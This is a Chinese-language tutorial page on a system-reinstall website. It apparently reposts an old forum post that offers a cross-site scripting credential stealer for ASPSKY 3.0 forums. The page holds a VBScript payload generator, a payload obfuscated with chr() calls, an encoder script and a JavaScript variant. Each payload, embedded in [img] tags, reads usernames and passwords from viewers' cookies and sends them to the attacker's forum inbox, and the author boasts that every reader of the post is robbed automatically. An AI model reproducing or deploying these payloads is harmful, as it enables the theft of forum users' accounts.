搜索
关闭
热门搜索: win11正式 win10win11 win11 windows10 win11系统下载 windows11

  • 微软原版系统

  • 一键重装系统

  • 纯净系统

  • 在线技术客服

魔法猪系统重装大师 一键在线制作启动 U 盘 PE 系统 用一键重装的魔法拯救失去灵魂的系统
立即下载
当前位置:首页 > 教程 > 电脑教程

跨站脚本弹框问题解决

时间:2015年04月02日 12:02:15    来源:魔法猪系统重装大师官网    人气:10077

跨站脚本得COOKIE弹框框的问题

 同时把密码用户名发到你在论坛的邮相里,爽吧

 先头看到欲望之翼的self.window的办法

其实我一直有个从来没给任何人说的办法:

玩了好久了公布了呵呵:

  

<script language=vbs>

sub changeq()

if form1.loc.value="" or form1.who.value="" then

msgbox "没有加入地址或用户名?"

exit sub

end if

loc=form1.loc.value

user=form1.who.value

str="[img]vbscript:execute("on error resume next: call document.body.inse

rtAdjacentHTML(""beforeEnd"",""

gt;

""):call se

ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="

& user & "&title=""+mid(documents.cookie,instr(lcase(documents.cookie),

""password"")+9,10)+""&message=""+""I am a goo

d boy"",""_self"")  ")[/img]"

form1.area.value=str

end sub

 

</script>

ASPSKY 3.0 偷号器---C.Z.Y原创

设置发送地址:

▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录

最后

不用加/)

发送的用户名:-------------


生成的代码:)

 

搞了大半天的结果,偷aspsky 3.0 密码的东东把下面的代码改一改

然后发到你的贴子里,只要有人看你的贴子他的密码就自动发到你的在

论坛上的邮箱里了,爽吧,其实我的是用VBScript写的snwcwt用javascript

写的没有双引号的问题而且可以同时写几行代码所以要实用一些!!

  不过效果都差不多哈:)(注意要先把下面的东东改一下发送的地址然

后全部写在一行里)

  

[img]vbscript:window.open(chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&ch

r(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr

(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119

)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&c

hr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr

(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(1

10)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(6

1)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101

)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)

&chr(115)&chr(97)&chr(103)&chr(101)&chr(61)+chr(80)&chr(97)&chr(115)&chr(115)&ch

r(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(112)+chr(97)+c

hr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9,len(documents.cookie)-ins

tr(lcase(documents.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+c

hr(114)+chr(100))+9)+chr(32)+chr(32)+chr(32)+chr(32)+chr(78)&chr(97)&chr(109)&ch

r(101)&chr(58)+mid(lcase(documents.cookie),instr(lcase(documents.cookie),chr(117)+

chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))+9,(instr(lcase(do

cument.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(99)+chr(108)+chr(97)+chr(

115))-1)-instr(lcase(documents.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(11

0)+chr(97)+chr(109)+chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr(

61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)&

chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(1

03)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116

)&chr(104)&chr(61)&chr(49))[/img]

简化形式:window.open(打开的连接,窗体名,窗体大小设置)

打开的连接:

第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....

对应编码为:chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&

chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&ch

r(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(9

8)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103

)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&ch

r(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&ch

r(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(

122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(1

04)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(9

7)&chr(103)&chr(101)&chr(61)

不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改

对于编码看如下代码:

<script language=vbs>

sub main()

base=form1.text1.value

for i=1 to len(base)

aa=asc(mid(base,i,1))

document.write "chr(" & aa & ")" & "&"

next

end sub

</script>


  

 

第二部份:为提取的COOKIE中的用户名和密码

 

------------------------再来一个js的放便学习----------------------------------

[img]javascript:eval('var myCookie=documents.cookie;var iUser0=myCookie.indexOf(\

'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=my

Cookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie

.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCo

okie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdj

acentHTML(\'BeforeEnd\',\'

\');sendmessage.window.docum

ent.location=\'http://www.nnit30.com/newbbs/messanger.asp?action=send&touser=snw

cwt&title=\'+username+\'的密码&message=username=\'+username+\'    password=\'+pa

ssword+\'\';')[/img]
 

跨站,脚本,弹框,问题,解决,跨站,脚本,得,COOKIE,
上一篇:PGP密匙的生成以及PGP的基本命令 下一篇:qq自动回复在哪设置

Word转PDF软件

栏目:电脑教程 阅读:1000 2023/12/27

惠普系统:提升效率,实现智能化管理

栏目:电脑教程 阅读:1000 2023/12/27
Win7教程 更多>>
U盘教程 更多>>
Win10教程 更多>>
魔法猪学院 更多>>
系统下载 | 系统重装 | 重装教程 | 关于我们 | 联系我们 | 软件日志 | sitemap |

Copyright © 2015-2023 魔法猪 魔法猪系统重装大师

本站发布的系统仅为个人学习测试使用,请在下载后24小时内删除,不得用于任何商业用途,否则后果自负,请支持购买微软正版软件。

在线客服 查看微信 返回顶部